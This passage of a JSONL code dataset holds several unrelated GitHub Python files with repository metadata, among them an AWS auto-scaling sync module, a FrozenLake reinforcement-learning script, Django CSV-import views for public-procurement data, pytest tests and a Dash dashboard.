'aws_ingest_ec2_auto_scaling_groups_cleanup.json',\n neo4j_session,\n common_job_parameters,\n )\n\n\n@timeit\ndef cleanup_ec2_launch_configurations(neo4j_session: neo4j.Session, common_job_parameters: Dict) -> None:\n run_cleanup_job(\n 'aws_import_ec2_launch_configurations_cleanup.json',\n neo4j_session,\n common_job_parameters,\n )\n\n\n@timeit\ndef sync_ec2_auto_scaling_groups(\n neo4j_session: neo4j.Session, boto3_session: boto3.session.Session, regions: List[str],\n current_aws_account_id: str, update_tag: int, common_job_parameters: Dict,\n) -> None:\n for region in regions:\n logger.debug(\"Syncing auto scaling groups for region '%s' in account '%s'.\", region, current_aws_account_id)\n lc_data = get_launch_configurations(boto3_session, region)\n load_launch_configurations(neo4j_session, lc_data, region, current_aws_account_id, update_tag)\n data = get_ec2_auto_scaling_groups(boto3_session, region)\n load_ec2_auto_scaling_groups(neo4j_session, data, region, current_aws_account_id, update_tag)\n cleanup_ec2_auto_scaling_groups(neo4j_session, common_job_parameters)\n cleanup_ec2_launch_configurations(neo4j_session, common_job_parameters)\n","repo_name":"lyft/cartography","sub_path":"cartography/intel/aws/ec2/auto_scaling_groups.py","file_name":"auto_scaling_groups.py","file_ext":"py","file_size_in_byte":9223,"program_lang":"python","lang":"en","doc_type":"code","stars":2765,"dataset":"github-code","pt":"52"} +{"seq_id":"42580100057","text":"import gym\nimport math\nimport random\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom collections import namedtuple\nfrom itertools import count\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nTransition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))\n\nepsilon = 0.4\nGAMMA = 0.9\nBATCH_SIZE = 128\nepisode_num = 10000\ncapacity = 1000\nTARGET_UPDATE = 50\nenv = gym.make('FrozenLake-v0')\naction_num = env.action_space.n\nstate_num = env.observation_space.n\n\n\nclass ReplayMemory(object):\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n self.position = 0\n\n def push(self, *args):\n if len(self.memory) < self.capacity:\n self.memory.append(None)\n self.memory[self.position] = Transition(*args)\n self.position = (self.position + 1) % self.capacity\n\n def sample(self, batch_size):\n return random.sample(self.memory, batch_size)\n\n def __len__(self):\n return len(self.memory)\n\n\ndef one_hot_vec(dimension, index):\n v = torch.zeros(dimension)\n v[index] = 1\n return v\n\n\nclass DQN(nn.Module):\n\n def __init__(self, state_num, action_num):\n super(DQN, self).__init__()\n self.linear1 = nn.Linear(state_num, 8)\n self.linear2 = nn.Linear(8, action_num)\n\n def forward(self, x):\n x = F.relu(self.linear1(x))\n return self.linear2(x)\n\ndef QLearning():\n qtable = np.random.rand(state_num, action_num)\n def SelectAction(state):\n p = random.random()\n if p > epsilon:\n return np.argmax(qtable[state])\n else:\n return env.action_space.sample()\n\n def Evaluate(r):\n succ_num = 0\n for i in range(1000):\n state = env.reset()\n done = False\n while not done:\n if r:\n action = env.action_space.sample()\n else:\n action = np.argmax(qtable[state])\n next_state, reward, done, _ = env.step(action)\n state = next_state\n if state == 15:\n succ_num += 1\n print('success rate:', 100.0 * succ_num / 1000)\n for e in range(episode_num):\n if e % 1000 == 0:\n print(e)\n state = env.reset()\n done = False\n while not done:\n action = SelectAction(state)\n next_state, reward, done, _ = env.step(action)\n \n if done:\n qtable[state,action] += 0.1 * (reward - qtable[state,action])\n else:\n qtable[state,action] += 0.1 * (reward + GAMMA * np.max(qtable[next_state]) - qtable[state, action])\n \n state = next_state\n print(qtable)\n Evaluate(True)\n \n\ndef DeepQLearning():\n\n capacity = 1000\n\n model = DQN(state_num, action_num)\n ref = DQN(state_num, action_num)\n ref.load_state_dict(model.state_dict())\n ref.eval()\n\n #optimizer = optim.RMSprop(model.state_dict())\n optimizer = optim.Adam(model.parameters(), lr = 0.01)\n def SelectAction(state):\n global epsilon\n p = random.random()\n if p < epsilon:\n # return one_hot_vec(env.action_space.sample())\n return env.action_space.sample()\n else:\n # return one_hot_vec(model(state).max(1)[1].item())\n state_vec = one_hot_vec(state_num, state)\n return model(state_vec).argmax().item()\n\n memory = ReplayMemory(capacity)\n loss = nn.MSELoss()\n def Optimize():\n if len(memory) < BATCH_SIZE:\n return\n transitions = memory.sample(BATCH_SIZE)\n batch = Transition(*zip(*transitions))\n #print('batch.state', batch.state)\n state_batch = torch.stack(batch.state)\n action_batch = torch.tensor(batch.action, dtype=torch.int64)\n reward_batch = torch.stack(batch.reward)\n mask = []\n non_final_next_state = []\n for s in batch.next_state:\n if s is not None:\n mask.append(1)\n non_final_next_state.append(s)\n else:\n mask.append(0)\n next_state_mask = torch.tensor(mask, dtype=torch.int64)\n next_state_batch = torch.stack(non_final_next_state)\n\n #print('state_batch', state_batch.size())\n y = model(state_batch)\n #print('y', y.size())\n #print('action_batch', action_batch.size())\n state_action_values = torch.gather(y, 1, action_batch)\n #state_action_values = model(state_batch).gather(1, action_batch)\n\n next_state_values = torch.zeros(BATCH_SIZE, 1)\n y = ref(next_state_batch)\n #print('y', y.size())\n #print('next_state_values', next_state_values.size())\n next_state_values[next_state_mask] = ref(next_state_batch).max(1, keepdim=True)[0].detach()\n #next_state_value = ref(state_batch).max(1)[0].detach()\n #print('next_state_value', next_state_value.size())\n expected_state_action_values = reward_batch + (next_state_values * GAMMA)\n\n #loss = F.MSELoss(state_action_values, expected_state_action_values)\n #print(next_state_values.size(), reward_batch.size())\n #print(state_action_values.size(), expected_state_action_values.size())\n output = loss(state_action_values, expected_state_action_values)\n optimizer.zero_grad()\n output.backward()\n for param in model.parameters():\n param.grad.data.clamp_(-1, 1)\n optimizer.step()\n\n def Evaluate():\n success_num = 0\n for i in range(50):\n state = env.reset()\n done = False\n while not done:\n state_vec = one_hot_vec(state_num, state)\n action = model(state_vec).argmax().item()\n state, _, done, _ = env.step(action)\n if state == 15:\n success_num += 1\n print(\"Success ratio: \", 1.0 * success_num / 50 * 100, '%')\n\n for e in range(episode_num):\n state = env.reset()\n done = False\n #while not done:\n global epsilon\n for step in count():\n if step > 0 and step % 1000 == 0:\n epsilon -= 0.099\n action = SelectAction(state)\n next_state, reward, done, _ = env.step(action)\n\n state_vec = one_hot_vec(state_num, state)\n next_state_vec = one_hot_vec(state_num, next_state)\n reward_vec = torch.Tensor([reward])\n\n if done:\n next_state = None\n memory.push(state_vec, [action], next_state_vec, reward_vec)\n\n state = next_state\n\n Optimize()\n\n if done:\n break\n if e % TARGET_UPDATE == 0:\n ref.load_state_dict(model.state_dict())\n Evaluate()\n\n\n\nif __name__ == '__main__':\n #DeepQLearning()\n QLearning()\n","repo_name":"FengKaiyu/RTRee","sub_path":"cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74724856163","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 7 16:44:37 2021\n\n@author: wwwlu\n\"\"\"\n\nprint('Vamos converter um valor em metros para centímetros e milímetros!')\nm = float(input('Digite um valor em metros: '))\nkm = m/1000\nhm = m/100\ndam = m/10\ndm = m*10\ncm = m*100\nmm = m*1000\n\nprint('Convertendo, temos que {:.2f}m é igual a {:.0f}mm, {:.0f}cm, {:.0f}dm, {}dam, {}hm e {}km.' .format(m, mm, cm, dm, dam, hm, km))","repo_name":"fluiz7/Python","sub_path":"Exercícios/Q 008.py","file_name":"Q 008.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26298294015","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('library', '0009_auto_20151017_1514'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Borrower',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('person_that_borrowed_it', models.CharField(max_length=100)),\n ('book_that_was_borrowed', models.CharField(max_length=100)),\n ('no_of_copies', models.IntegerField()),\n ],\n ),\n migrations.DeleteModel(\n name='Borrowed',\n ),\n ]\n","repo_name":"samirotiv/ToyDjangoREST","sub_path":"demo/library/migrations/0010_auto_20151017_1526.py","file_name":"0010_auto_20151017_1526.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73521737764","text":"from math import sqrt\nn = int(input(\">\"))\n\nx = list(range(2, n))\n\n# k = 2\n# new = []\n# while k <= sqrt(n):\n# i = 0\n# z = set()\n# if k in x:\n# new.append(k)\n# z = set(range(k, len(x) + 2, k))\n# x = list(set(x) - set(z))\n# k += 1\n# print(x)\n\n\nk = 2\nnew = []\nwhile k <= sqrt(n):\n if k in x:\n new.append(k)\n i = 0\n while i < len(x):\n if x[i] % k == 0:\n del x[i]\n\n else:\n i += 1\n k += 1\n\n\n\nprint(new + x)\n\n\n","repo_name":"Gygrus/WDI-ASD-course-Python","sub_path":"Semestr I/zestaw_3/cw3.py","file_name":"cw3.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74912172003","text":"from django.shortcuts import render\nfrom django.shortcuts import render,redirect\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.views import generic\nfrom django.urls import reverse, reverse_lazy\nimport csv\nimport io\nimport os\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nfrom django.http import HttpResponse\nfrom datetime import datetime\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate\nimport shutil\nfrom django.conf import settings\nfrom django.db.models import Q\nimport tempfile\n\nfrom analisiscompraspublicas.models import contract, sri_ente, award, release, planning, supplier, tender\n\n\ndef CargaInfoView(request):\n template_name = \"cargainfo/cargainfo.html\"\n context = {} \n\n if request.method == 'POST':\n csv_file = request.FILES['archivo_csv']\n # validar el nombre del archivo en los primeros 7 caracteres\n if csv_file.name[:10] == \"contracts_\":\n cargar_info_csv(csv_file, request.user, \"|\")\n\n if csv_file.name[:7] == \"awards_\":\n cargar_info_award(csv_file, request.user, \"|\")\n\n if csv_file.name[:9] == \"releases_\":\n cargar_info_release(csv_file, request.user, \"|\")\n\n if csv_file.name[:9] == \"planning_\":\n cargar_info_planning(csv_file, request.user, \"|\")\n\n if csv_file.name[:10] == \"suppliers_\":\n cargar_info_supplier(csv_file, request.user, \"|\")\n\n if csv_file.name[:7] == \"tender_\":\n cargar_info_tender(csv_file, request.user, \"|\")\n\n if csv_file.name[:7] == \"SRI_RUC\":\n cargar_info_sri(csv_file, request.user, \"|\")\n \n return render(request, template_name, context = { 'mensaje' : \"Archivo procesado\" })\n\n\ndef cargar_info_csv(csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n \n try:\n columns = ','.join(line).split(separador)\n ocid = columns[0] #.replace(\"'\",\"\")\n release_id = columns[1] #.replace(\"'\",\"\")\n co_id = columns[2] #.replace(\"'\",\"\")\n awardID = columns[3] #.replace(\"'\",\"\")\n title = columns[4] #.replace(\"'\",\"\")\n description = columns[5] #.replace(\"'\",\"\")\n status = columns[6] #.replace(\"'\",\"\")\n contractPeriod_startDate = columns[7][:10] # #.replace(\"'\",\"\")[:10]\n contractPeriod_endDate = columns[8] #.replace(\"'\",\"\")\n contractPeriod_maxExtentDate = columns[9] #.replace(\"'\",\"\")\n contractPeriod_durationInDays = columns[10] #.replace(\"'\",\"\")\n amount = columns[11] #.replace(\"'\",\"\")\n currency = columns[12] #.replace(\"'\",\"\")\n dateSigned = columns[13][:10] # #.replace(\"'\",\"\")[:10]\n\n # Guarda solicitud de compra\n ocontract = contract(\n ocid = ocid,\n release_id = release_id,\n co_id = co_id,\n awardID = awardID,\n title = title,\n description = description,\n status = status,\n contractPeriod_startDate = contractPeriod_startDate,\n contractPeriod_endDate = contractPeriod_endDate,\n contractPeriod_maxExtentDate = contractPeriod_maxExtentDate,\n contractPeriod_durationInDays = contractPeriod_durationInDays,\n amount = amount,\n currency = currency,\n dateSigned = dateSigned)\n ocontract.save()\n except Exception as e:\n columns = None\n finally:\n columns = None\n\n\ndef cargar_info_sri (csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"ansi\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n try:\n columns = line.split(separador)\n numero_ruc = columns[0]\n razon_social = columns[1]\n provincia_jurisdiccion = columns[2]\n nombre_comercial = columns[3]\n estado_contribuyente = columns[4]\n clase_contribuyente = columns[5]\n fecha_inicio_actividades = columns[6]\n fecha_actualizacion = columns[7]\n fecha_suspension_definitiva = columns[8]\n fecha_reinicio_actividades = columns[9]\n obligado = columns[10]\n tipo_contribuyente = columns[11]\n numero_establecimiento = columns[12]\n nombre_fantasia_comercial = columns[13]\n estado_establecimiento = columns[14]\n descripcion_provincia_est = columns[15]\n descripcion_canton_est = columns[16]\n descripcion_parroquia_est = columns[17]\n codigo_ciiu = columns[18]\n actividad_economica = columns[19]\n\n # Guarda solicitud de compra\n osri_ente = sri_ente(\n numero_ruc = numero_ruc,\n razon_social = razon_social,\n provincia_jurisdiccion = provincia_jurisdiccion,\n nombre_comercial = nombre_comercial,\n estado_contribuyente = estado_contribuyente,\n clase_contribuyente = clase_contribuyente,\n fecha_inicio_actividades = fecha_inicio_actividades,\n fecha_actualizacion = fecha_actualizacion,\n fecha_suspension_definitiva = fecha_suspension_definitiva,\n fecha_reinicio_actividades = fecha_reinicio_actividades,\n obligado = obligado,\n tipo_contribuyente = tipo_contribuyente,\n numero_establecimiento = numero_establecimiento,\n nombre_fantasia_comercial = nombre_fantasia_comercial,\n estado_establecimiento = estado_establecimiento,\n descripcion_provincia_est = descripcion_provincia_est,\n descripcion_canton_est = descripcion_canton_est,\n descripcion_parroquia_est = descripcion_parroquia_est,\n codigo_ciiu = codigo_ciiu,\n actividad_economica = actividad_economica\n )\n osri_ente.save()\n except Exception as e:\n columns = None\n finally:\n columns = None\n\n\ndef cargar_info_award(csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n try:\n columns = ','.join(line).split(separador)\n ocid = columns[0] #.replace(\"'\",\"\")\n release_id = columns[1] #.replace(\"'\",\"\")\n aw_id = columns[2] #.replace(\"'\",\"\")\n title = columns[3] #.replace(\"'\",\"\")\n description = columns[4] #.replace(\"'\",\"\")\n status = columns[5] #.replace(\"'\",\"\")\n date = columns[6] #.replace(\"'\",\"\")\n amount = columns[7] #.replace(\"'\",\"\")\n currency = columns[8] #.replace(\"'\",\"\")\n correctedValue_amount = columns[9] #.replace(\"'\",\"\")\n correctedValue_currency = columns[10] #.replace(\"'\",\"\")\n enteredValue_amount = columns[11] #.replace(\"'\",\"\")\n enteredValue_currency = columns[12] #.replace(\"'\",\"\")\n contractPeriod_startDate = columns[13][:10] # #.replace(\"'\",\"\")[:10]\n contractPeriod_endDate = columns[14][:10] # #.replace(\"'\",\"\")[:10]\n contractPeriod_maxExtentDate = columns[15][:10] # #.replace(\"'\",\"\")[:10]\n contractPeriod_durationInDays = columns[16] #.replace(\"'\",\"\")\n\n # Guarda solicitud de compra\n oaward = award(\n ocid = ocid,\n release_id = release_id,\n aw_id = aw_id,\n title = title,\n description = description,\n status = status,\n date = date,\n amount = amount,\n currency = currency,\n correctedValue_amount = correctedValue_amount,\n correctedValue_currency = correctedValue_currency,\n enteredValue_amount = enteredValue_amount,\n enteredValue_currency = enteredValue_currency,\n contractPeriod_startDate = contractPeriod_startDate,\n contractPeriod_endDate = contractPeriod_endDate,\n contractPeriod_maxExtentDate = contractPeriod_maxExtentDate,\n contractPeriod_durationInDays = contractPeriod_durationInDays\n )\n oaward.save()\n except Exception as e:\n columns = None\n finally:\n columns = None\n\n\ndef cargar_info_release(csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n try:\n columns = ','.join(line).split(separador)\n ocid = columns[0] #.replace(\"'\",\"\")\n re_id = columns[1] #.replace(\"'\",\"\")\n initiationType = columns[2] #.replace(\"'\",\"\")\n buyer_id = columns[3] #.replace(\"'\",\"\")\n buyer_name = columns[4] #.replace(\"'\",\"\")\n language = columns[5] #.replace(\"'\",\"\")\n date = columns[6] #.replace(\"'\",\"\")\n tag = columns[7] #.replace(\"'\",\"\")\n\n # Guarda solicitud de compra\n orelease = release(\n ocid = ocid,\n re_id = re_id,\n initiationType = initiationType,\n buyer_id = buyer_id,\n buyer_name = buyer_name,\n language = language,\n date = date,\n tag = tag\n )\n orelease.save()\n except Exception as e:\n columns = None\n finally:\n columns = None\n\ndef cargar_info_planning(csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n try:\n columns = ','.join(line).split(separador)\n ocid = columns[0] #.replace(\"'\",\"\")\n pa_id = columns[1] #.replace(\"'\",\"\")\n rationale = columns[2] #.replace(\"'\",\"\")\n budget_id = columns[3] #.replace(\"'\",\"\")\n budget_description = columns[4] #.replace(\"'\",\"\")\n budget_amount = columns[5] #.replace(\"'\",\"\")\n budget_currency = columns[6] #.replace(\"'\",\"\")\n\n\n # Guarda solicitud de compra\n oplanning = planning(\n ocid = ocid,\n pa_id = pa_id,\n rationale = rationale,\n budget_id = budget_id,\n budget_description = budget_description,\n budget_amount = budget_amount,\n budget_currency = budget_currency\n )\n \n oplanning.save()\n except Exception as e:\n columns = None\n finally:\n columns = None\n\ndef cargar_info_supplier(csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n try:\n columns = ','.join(line).split(separador)\n ocid = columns[0] #.replace(\"'\",\"\")\n release_id = columns[1] #.replace(\"'\",\"\")\n award_id = columns[2] #.replace(\"'\",\"\")\n su_id = columns[3] #.replace(\"'\",\"\")\n name = columns[4] #.replace(\"'\",\"\")\n\n # Guarda solicitud de compra\n osupplier = supplier(\n ocid = ocid,\n release_id = release_id,\n award_id = award_id,\n su_id = su_id,\n name = name\n )\n \n osupplier.save()\n except Exception as e:\n columns = None\n finally:\n columns = None\n\ndef cargar_info_tender(csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n try:\n columns = ','.join(line).split(separador)\n ocid = columns[0] #.replace(\"'\",\"\")\n release_id = columns[1] #.replace(\"'\",\"\")\n te_id = columns[2] #.replace(\"'\",\"\")\n title = columns[3] #.replace(\"'\",\"\")\n description = columns[4] #.replace(\"'\",\"\")\n status = columns[5] #.replace(\"'\",\"\")\n procuringEntity_id = columns[6] #.replace(\"'\",\"\")\n procuringEntity_name = columns[7] #.replace(\"'\",\"\")\n value_amount = columns[8] #.replace(\"'\",\"\")\n value_currency = columns[9] #.replace(\"'\",\"\")\n procurementMethod = columns[10] #.replace(\"'\",\"\")\n procurementMethodDetails = columns[11] #.replace(\"'\",\"\")\n mainProcurementCategory = columns[12] #.replace(\"'\",\"\")\n awardCriteria = columns[13] #.replace(\"'\",\"\")\n tenderPeriod_startDate = columns[14][:10] # #.replace(\"'\",\"\")[:10]\n tenderPeriod_endDate = columns[15][:10] # #.replace(\"'\",\"\")[:10]\n tenderPeriod_maxExtentDate = columns[16] #.replace(\"'\",\"\")\n tenderPeriod_durationInDays = columns[17] #.replace(\"'\",\"\")\n enquiryPeriod_startDate = columns[18][:10] # #.replace(\"'\",\"\")[:10]\n enquiryPeriod_endDate = columns[19][:10] # #.replace(\"'\",\"\")[:10]\n enquiryPeriod_maxExtentDate = columns[20][:10] # #.replace(\"'\",\"\")[:10]\n enquiryPeriod_durationInDays = columns[21] #.replace(\"'\",\"\")\n hasEnquiries = columns[22] #.replace(\"'\",\"\")\n eligibilityCriteria = columns[23] #.replace(\"'\",\"\")\n awardPeriod_startDate = columns[24][:10] # #.replace(\"'\",\"\")[:10]\n awardPeriod_endDate = columns[25][:10] # #.replace(\"'\",\"\")[:10]\n awardPeriod_maxExtentDate = columns[26][:10] # #.replace(\"'\",\"\")[:10]\n awardPeriod_durationInDays = columns[27] #.replace(\"'\",\"\")\n numberOfTenderers = columns[28] #.replace(\"'\",\"\")\n\n # Guarda solicitud de compra\n otender = tender(\n ocid = ocid,\n release_id = release_id,\n te_id = te_id,\n title = title,\n description = description,\n status = status,\n procuringEntity_id = procuringEntity_id,\n procuringEntity_name = procuringEntity_name,\n value_amount = value_amount,\n value_currency = value_currency,\n procurementMethod = procurementMethod,\n procurementMethodDetails = procurementMethodDetails,\n mainProcurementCategory = mainProcurementCategory,\n awardCriteria = awardCriteria,\n tenderPeriod_startDate = tenderPeriod_startDate,\n tenderPeriod_endDate = tenderPeriod_endDate,\n tenderPeriod_maxExtentDate = tenderPeriod_maxExtentDate,\n tenderPeriod_durationInDays = tenderPeriod_durationInDays,\n enquiryPeriod_startDate = enquiryPeriod_startDate,\n enquiryPeriod_endDate = enquiryPeriod_endDate,\n enquiryPeriod_maxExtentDate = enquiryPeriod_maxExtentDate,\n enquiryPeriod_durationInDays = enquiryPeriod_durationInDays,\n hasEnquiries = hasEnquiries,\n eligibilityCriteria = eligibilityCriteria,\n awardPeriod_startDate = awardPeriod_startDate,\n awardPeriod_endDate = awardPeriod_endDate,\n awardPeriod_maxExtentDate = awardPeriod_maxExtentDate,\n awardPeriod_durationInDays = awardPeriod_durationInDays,\n numberOfTenderers = numberOfTenderers\n )\n otender.save()\n except Exception as e:\n columns = None\n finally:\n columns = None","repo_name":"Shadycore/iacompraspublicas","sub_path":"cargainfo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11184986230","text":"# THIS FILE IS DEPRECATED!!!\n# Make changes to WordSeries.py!!!\n\nimport sys\n\ndef get_symbols():\n\t'''instantiate dictionarty of symbol_series'''\n\tfilename = \"symbol_series.txt\"\n\tsymbol_dict = {}\n\twith open(filename, 'r') as f:\n\t\tfor line in f.readlines():\n\t\t\tdata = line.strip().split(' ')\n\t\t\tfor item in data:\n\t\t\t\tsymbol_dict[item] = data[0]\n\treturn symbol_dict\n\ndef get_word_series(word, symbol_dict):\n\t'''determines the series of each sound in word'''\n\tword_series = []\n\tcurrent_state = ''\n\tfor letter in word:\n\t\tif current_state == '':\n\t\t\tcurrent_state = letter\n\t\t\tcontinue\n\t\tif current_state + letter in \\\n\t\t\t[key[:len(current_state+letter)] for key in symbol_dict.keys()]:\n\t\t\tcurrent_state += letter\n\t\telse:\n\t\t\tword_series.append(symbol_dict[current_state])\n\t\t\tcurrent_state = letter\n\tword_series.append(symbol_dict[current_state])\n\treturn word_series\n\ndef test_set():\n\ttest_words = ['mani', 'waḵi', \"'amnōkun\", \"'anūnkīn\", \"k`amits\", \"pṓtr'mō\", \"'ama'\", \"uʃ\", \"p`ak̄'āthinhin\"]\n\tsymbol_dict = get_symbols()\n\tprint(symbol_dict)\n\tfor word in test_words:\n\t\tprint(word, ':', get_word_series(word, symbol_dict))\n\nif __name__ == '__main__':\n\ttest_set()\n","repo_name":"nathanmwhite/yowlumne_wield","sub_path":"matching/get_series.py","file_name":"get_series.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39986576910","text":"import pytest\nimport logging\nfrom app.main import parse_cli, load_config, convert_from_human_readable, setup_log\n\n\n@pytest.mark.parametrize(\n \"in_value,out_value\",\n [\n (1000, 1000),\n (\"1000\", 1000),\n (\"10k\", 10240),\n (\"10M\", 10485760),\n (\"10G\", 10737418240),\n ],\n)\ndef test_convert_from_human_readable(in_value, out_value) -> None:\n \"\"\"Test the conversion of ex. 10k to 10240.\"\"\"\n assert convert_from_human_readable(in_value) == out_value\n\n\ndef test_convert_from_human_readable_fail() -> None:\n \"\"\"Test when the conversion fails.\"\"\"\n with pytest.raises(ValueError):\n assert convert_from_human_readable(\"10m\")\n\n\ndef test_parse_cli() -> None:\n \"\"\"Test the parsing of the CLI options.\"\"\"\n options = parse_cli(cli_args=[\"-c\", \"tests/testdata/sample_config.ini\"])\n\n assert options.configfile == \"tests/testdata/sample_config.ini\"\n\n\ndef test_load_config() -> None:\n \"\"\"Test the load of the config file.\"\"\"\n with pytest.raises(FileNotFoundError):\n load_config(configfile=\"tests/testdata/file_does_nor_exist.ini\")\n\n config = load_config(configfile=\"tests/testdata/config_ok.ini\")\n\n assert config.items(\"logging\") == [\n (\"loglevel\", \"debug\"),\n (\"logfile\", \"/path/to/logfile.log\"),\n (\"keep\", \"10\"),\n (\"size\", \"10M\"),\n (\"log_to_stdout\", \"no\"),\n ]\n\n assert config.items(\"serial\") == [\n (\"port\", \"/dev/serial0\"),\n (\"speed\", \"115000\"),\n (\"bytes\", \"8\"),\n (\"parity\", \"N\"),\n (\"stopbits\", \"1\"),\n ]\n\n assert config.items(\"influx\") == [\n (\"hostname\", \"127.0.0.1\"),\n (\"port\", \"8086\"),\n (\"database\", \"smartmeter\"),\n ]\n\n\ndef test_setup_logging():\n \"\"\"Test if we can setup the logging.\"\"\"\n logger = setup_log(filename=\"testlog.log\", size=\"1M\", keep=2, log_to_stdout=True)\n\n assert isinstance(logger.handlers[0], logging.handlers.RotatingFileHandler)\n assert isinstance(logger.handlers[1], logging.StreamHandler)\n","repo_name":"WimDH/smartmeter-python","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6918926168","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nfrom datetime import datetime,timedelta\n\nimport pandas as pd\n\nfrom django.apps import apps\n\nfrom django_plotly_dash import DjangoDash\n\n\n\ndef fraud_inspector_FraudOrders(city ,start_date,end_date):\n FraudOrders=apps.get_model('fraud_inspector','FraudOrders')\n head=[]\n for e in FraudOrders._meta.get_fields():\n head.append((str(e)).replace(\"fraud_inspector.FraudOrders.\", ''))\n if '0' in city or 0 in city:\n FraudOrder=FraudOrders.objects.filter(order_date__range=(start_date,end_date))\n FraudOrder=FraudOrder.values_list()\n else:\n FraudOrder=FraudOrders.objects.filter(launch_region_id__in=city,order_date__range=(start_date,end_date))\n FraudOrder=FraudOrder.values_list() \n FraudOrder=pd.DataFrame(FraudOrder,columns=head)\n FraudOrder['order_date']=pd.to_datetime(FraudOrder['order_date'], errors='coerce')\n FraudOrder['order_date']=FraudOrder['order_date'].dt.date\n FraudOrder=FraudOrder[['order_date','resolution']]\n FraudOrder=FraudOrder.groupby(['order_date','resolution']).size().reset_index(name='resolution_count')\n FraudOrder=FraudOrder.sort_values(['order_date'], ascending = [1])\n FRAUD_NO=FraudOrder.loc[(FraudOrder['resolution'] == 'FRAUD NO')]\n FRAUD_YES=FraudOrder.loc[(FraudOrder['resolution'] == 'FRAUD YES')]\n x_n=FRAUD_NO['order_date'].values.tolist()\n y_n=FRAUD_NO['resolution_count'].values.tolist()\n x_y=FRAUD_YES['order_date'].values.tolist()\n y_y=FRAUD_YES['resolution_count'].values.tolist()\n\n return x_n,y_n,x_y,y_y\n\ndef fraud_inspector_option_city():\n option_citys=apps.get_model('fraud_inspector','option_city')\n option_city=option_citys.objects.all()\n option_city=option_city.values_list()\n return option_city\n\n\n\nclass per_fraud_inspector():\n option_city = fraud_inspector_option_city()\n \n\n\n\nlabels = {'Point 1': (3.5,5), 'Point 2': (1.5,2), 'Point 3': (3.5,8)}\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css','//cdn.datatables.net/1.10.19/css/jquery.dataTables.min.css']\n\napp = DjangoDash('Fraf_dash_fols')\n\n\napp.layout = html.Div([\n dcc.Dropdown(id='city',\n options=[{'label': i[1], 'value': i[2]} for i in fraud_inspector_option_city()]\n ,multi=True,value='0'),\n dcc.DatePickerRange(id='input1',display_format='Y-M-D',start_date=(datetime.now()- timedelta(days=30)).strftime('%Y-%m-%d'),\n end_date=datetime.now().strftime('%Y-%m-%d'),clearable=True,with_portal=True,), \n html.Button('Загрузка', id='button',style={'height': 47}),\n html.Div(id='output-container-button',\n children='Enter a value and press submit')\n])\n\n\n@app.callback(\n dash.dependencies.Output('output-container-button', 'children'),\n [dash.dependencies.Input('button', 'n_clicks')],\n [dash.dependencies.State('city', 'value'),\n 